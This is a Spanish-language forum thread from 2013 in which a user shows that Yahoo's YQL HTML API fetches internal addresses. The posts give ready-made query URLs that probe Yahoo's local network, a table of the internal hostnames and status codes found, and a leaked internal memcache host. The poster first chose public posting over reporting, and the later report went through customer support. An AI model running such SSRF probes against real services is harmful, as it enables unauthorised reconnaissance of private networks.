Acceso a la red local del servidor de Yahoo a traves de Yahoo QL

Iniciado por WHK, 3 Julio 2013, 20:25 PM

0 Miembros y 1 Visitante están viendo este tema.

WHK

Vamos a convertirnos en trolls por un par de minutos y vamos a darle un vistazo a la consola QL de Yahoo la cual permite realizar multiples consultas a distintas apis de Yahoo pero a modo de SQL.

Ejemplo de una simple query:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=show tables

Esto nos devolverá todas las tablas (servicios, apis).

Ahora probaremos utilizar la api HTML de la siguiente manera:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://foro.elhacker.net/"

Esto nos devolverá el contenido HTML parseado en XML.

Ahora que ya entendimos un poco sobre el funcionamiento de YQL vamos a trollear un poco:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/"

Nos retornará:
Código (xml) [Seleccionar]
<url ... http-status-code="502" http-status-message="Network is unreachable">http://192.168.1.1/</url>

Pero si intentamos entrar a la subred local 0.1: http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.0.1/"
Código (xml) [Seleccionar]
<url ... http-status-code="403" http-status-message="Forbidden">http://192.168.0.1/</url>

Esto nos demuestra una cosa: que la api de peticiones HTTP no filtra ips ni dominios :D asi que podemos pasearnos por toda la red local si queremos ya que al intentar entrar a la puerta predeterminada de enlace (router o switch o lo que sea) nos arrojó un error 403 que probablemente haya retornado el panel de administración del router ya que cuando probamos con otras ips locales simplemente nos dice que es imposible conectarse (error 502 Cannot find server).

Probamos otras urls sensibles:
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403 (necesita autorización, ¿como?: buena pregunta)
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://admin/login/ : Timed out waiting for operation - failing node: memcache4.yql.bf1.yahoo.com/68.142.224.71:11211
http://68.142.224.71/ : 502 - Connection refused
http://local/ : 404 - Not Found Tenemos acceso a un servidor WEB local!
http://dev/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://developer/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request

Información útil para comenzar a husmear dentro de los servidores locales de yahoo :)

Saludos.

Søra

Verdaderamente bueno WHK, Una duda ¿Lo has reportado a yahoo?

Un saludo!





Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.

WHK

Cita de: Søra en  4 Julio 2013, 11:15 AM
Verdaderamente bueno WHK, Una duda ¿Lo has reportado a yahoo?

Un saludo!

Lo intenté pero para poder reportar un problema de seguridad debes saber ingles perfectamente (-1, no es mi lengua nativa) y a demás hay que pasar por toda una serie de formularios y registros (-2) que al final en ves de terminar reportando un bug terminan ellos desmoralizandote, algo así como sucede con las operadoras de movistar, despues de una hora recién puedes optar por hablar con alguien.

Asi que para que calentarme la cabeza, mejor lo posteo en el foro y ya, si con el tiempo alguien le saca provecho entonces recién se apresurarán a parcharlo, talves resulte mas rápido que intentar reportarlo.

WHK

Søra, ahi está tu respuesta:

Citar
Customer By Email (WHK Yan)   07/08/2013 07:49 AM
Hola, disculpe que no le escriba en ingles pero solamente se español.

He encontrad un problema de seguridad en Yahoo QL la cual podría permitir el acceso no autorizado a la red local.

Por ejemplo:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/"
...
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://local/ : 404 - Not Found
http://dev/ : 404 - Not Found on Accelerator
http://developer/ : 404 - Not Found on Accelerator
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request

No estoy seguro si en algún momento será posible acceder a algún servicio o poder burlar la api para poder ingresar a algún servidor local, pero si ha revelado información muy sensible sobre la estructura interna de los servidores. Por ejemplo un delincuente informático ya sería capaz de saber que el nivel de red local varía entre 192.168.0.x y podría realizar un barrido de ips escaneando todos los posibles puntos de accesos y preparar un ataque mas sofisticado comprometiendo la información confidencial que pueda almacenar cada uno o ls puntos que tengan acceso directo a el.

Saludos.



Response Via Email (Louise Carter)
Hi WHK,

Thanks for contacting Yahoo!.

The Yahoo! service that you have written about is targeted at a primarily English-speaking audience. Yahoo! is able to take appropriate action against content posted by users on Yahoo! services that may violate the Yahoo! Terms of Service

We are currently unable to determine if the content posted on the site you wrote us about is in violation of the Yahoo! Terms of Service. If you believe that you may be in danger, please contact your local law enforcement agency immediately. Otherwise, forward a translation of the abusive material, and we will review the situation further and take appropriate action.

You can find some extra information about this (and other Yahoo! products) through Yahoo! Help Central.

Thanks again,

Louise Carter

Yahoo! Customer Care

greycore

Ya te lo han dicho claro, o lo traduces o nada xD

Parece mentira que no tengan soporte en español... pero vaya, ellos sabrán lo que hacen, si intentas comunicarte con ellos y te ponen tantas pegas, si después se usa ese problema de seguridad contra ellos no podrás decir que no lo intentaste.

WHK

Y mira lo que me han respondido ahora:

CitarWe have not heard from you concerning your request for support in the 72 hours since we sent you a response. Consequently, we have changed the status of your question to SOLVED.

xDDDD seeeeeeeh está muy resuelto xD

Søra






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.